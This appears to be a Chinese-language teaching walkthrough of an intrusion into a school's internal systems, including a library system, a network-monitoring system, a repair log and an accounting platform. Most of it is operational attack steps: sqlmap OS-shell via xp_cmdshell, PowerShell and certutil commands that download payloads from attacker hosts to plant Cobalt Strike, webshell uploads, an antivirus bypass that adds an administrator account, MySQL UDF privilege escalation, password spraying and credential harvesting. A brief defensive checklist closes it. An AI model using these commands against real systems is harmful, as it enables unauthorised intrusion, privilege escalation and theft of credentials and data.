学校内网渗透测试实战教学文档<\/h1>

一、图书馆管理系统渗透<\/h2>

1.1 SQL注入开启xp_cmdshell<\/h3>

发现过程<\/strong>：<\/p>

通过目录扫描发现Web API Help接口文档泄露<\/li>
测试发现szReaderID参数存在SQL注入漏洞（单引号报错，双引号正常）<\/li> <\/ul>
利用方法<\/strong>：<\/p>
sqlmap -u "目标URL"<\/span> --os-shell <\/span><\/span><\/code><\/pre> 由于是SQL Server数据库，可直接使用--os-shell<\/code>参数开启xp_cmdshell进行命令执行<\/li> <\/ul> 1.2 远程下载上线Cobalt Strike<\/h3> 常用远程下载命令<\/strong>：<\/p> certutil -urlcache -split -f http:\/\/127.0.0.1:8080\/nc.txt c:\\nc.txt <\/span><\/span>bitsadmin \/rawreturn \/transfer getfile http:\/\/download.sysinternals.com\/files\/PSTools.zip c:\\Pstools.zip <\/span><\/span>powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http:\/\/127.0.0.1\/nc.txt','nc.exe') <\/span><\/span>cmd \/c start \/min msedge.exe http:\/\/127.0.0.1\/test.zip && timeout 5 && taskkill \/f \/t \/im msedge.exe && C:\/Users\/%UserName%\/Downloads\/test.zip <\/span><\/span><\/code><\/pre>实际利用<\/strong>：<\/p> powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http:\/\/xxx.xxx.xxx.xx:8000\/360safe.exe'<\/span>,'c:\\programdata\\360safe.exe'<\/span>) <\/span><\/span><\/code><\/pre>1.3 网站根目录写Webshell<\/h3> 查找网站根目录<\/strong>：<\/p> Dir<\/span> \/s \/b D:\\app.a1cccec9.js <\/span><\/span><\/code><\/pre> 发现JS目录：D:\\disttsg\dist\js<\/code><\/li> <\/ul> 绕过杀软技巧<\/strong>：<\/p> 修改冰蝎Webshell的默认密码可绕过部分杀软检测<\/li> <\/ul> 1.4 提权与密码收集<\/h3> 提权方法<\/strong>：<\/p> 使用巨龙拉冬(Ladon)插件的"System2Admin"功能<\/li> 伪造system权限反弹管理员权限会话<\/li> <\/ul> 密码破解与横向移动<\/strong>：<\/p> 使用cmd5.com破解哈希<\/li> 使用超级弱口令爆破工具喷洒B段<\/li> 使用xfreerdp远程连接：<\/li> <\/ul> xfreerdp \/u:Administrator \/p:Password123 \/v:xxx.xxx.xxx.xxx \/size:80% <\/span><\/span><\/code><\/pre>敏感信息收集工具<\/strong>：<\/p> searchall：收集敏感文件及浏览器缓存信息<\/li> <\/ul> https:\/\/github.com\/Naturehi666\/searchall <\/span><\/span><\/code><\/pre>二、违规联网检测系统渗透<\/h2> 2.1 接口未授权访问<\/h3> 发现过程<\/strong>：<\/p> \/api\/v1\/system\/user<\/code>接口泄露管理员密码<\/li> \/api\/v1\/toolAct\/findAgg?orderBy=<\/code>存在SQL注入且未授权<\/li> <\/ul> 2.2 UDF提权<\/h3> MySQL信息收集<\/strong>：<\/p> show<\/span> variables like<\/span> 'secure_file_priv'<\/span>; <\/span><\/span>show<\/span> variables like<\/span> '%version_%'<\/span>; <\/span><\/span><\/code><\/pre>UDF提权命令<\/strong>：<\/p> sqlmap -d "mysql:\/\/root:密码@xxx.xxx.xxx.xxx:3306\/mysql"<\/span> --random-agent --os-shell <\/span><\/span><\/code><\/pre>2.3 绕过火绒添加用户<\/h3> 绕过方法<\/strong>：<\/p> 创建批处理脚本(1.bat)：<\/li> <\/ol> copy<\/span> c:\windows\system32\net1.exe d:\update.exe <\/span><\/span>d:\update.exe user newuser password123 \/ad<\/span> <\/span><\/span>net localgroup administrators newuser \/ad <\/span><\/span><\/code><\/pre> 使用PowerShell下载并执行：<\/li> <\/ol> powershell -nop -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http:\/\/xxx.xxx.xxx.xxx:8000\/1.bat'<\/span>,'d:\1.bat'<\/span>) <\/span><\/span><\/code><\/pre>Elastic未授权访问利用<\/strong>：<\/p> 使用ElasticHD进行可视化管理<\/li> <\/ul> https:\/\/github.com\/qax-os\/ElasticHD <\/span><\/span><\/code><\/pre>三、网络报修登记系统渗透<\/h2> 3.1 SQL注入获取敏感数据<\/h3> 发现过程<\/strong>：<\/p> 发现未授权访问的\/api\/getPageData.php<\/code><\/li> Fuzz测试发现filter<\/code>参数存在注入<\/li> <\/ul> 3.2 敏感信息泄露<\/h3> 发现内容<\/strong>：<\/p> 阿里云accesskey和accessecret泄露<\/li> 数据库密码泄露<\/li> <\/ul> OSS管理工具<\/strong>：<\/p> https:\/\/github.com\/aliyun\/oss-browser <\/span><\/span><\/code><\/pre>四、会计实训系统渗透<\/h2> 4.1 .NET UEditor文件上传<\/h3> 利用方法<\/strong>：<\/p> 准备冰蝎马并重命名为security.jpg<\/li> 使用Hackbar发送POST请求：<\/li> <\/ol> source[]=http:\/\/xxx.xxx.xxx.xxx\/security.jpg?.a?s?p?x <\/code><\/pre> 五、其他渗透成果<\/h2> 5.1 文件上传绕过<\/h3> 技巧<\/strong>：<\/p> 禁用JS绕过前端验证<\/li> <\/ul> 5.2 网络设备RCE<\/h3> 利用方法<\/strong>：<\/p> 找到根目录后手工写Webshell<\/li> <\/ul> 5.3 Shiro反序列化<\/h3> 利用方法<\/strong>：<\/p> 使用Shiro反序列化工具一把梭<\/li> <\/ul> 六、总结与防御建议<\/h2> 渗透测试发现的主要漏洞类型：<\/h3> SQL注入漏洞<\/li> 未授权访问<\/li> 文件上传漏洞<\/li> 敏感信息泄露<\/li> 默认\/弱口令<\/li> 杀软绕过技术<\/li> <\/ol> 防御建议：<\/h3> 对所有输入参数进行严格过滤<\/li> 限制数据库权限，禁用xp_cmdshell等危险功能<\/li> 加强访问控制，避免未授权访问<\/li> 定期更新杀毒软件规则<\/li> 避免使用默认密码和弱口令<\/li> 定期检查并删除敏感信息泄露<\/li> 对文件上传功能进行严格限制<\/li> 及时更新系统和应用补丁<\/li> <\/ol>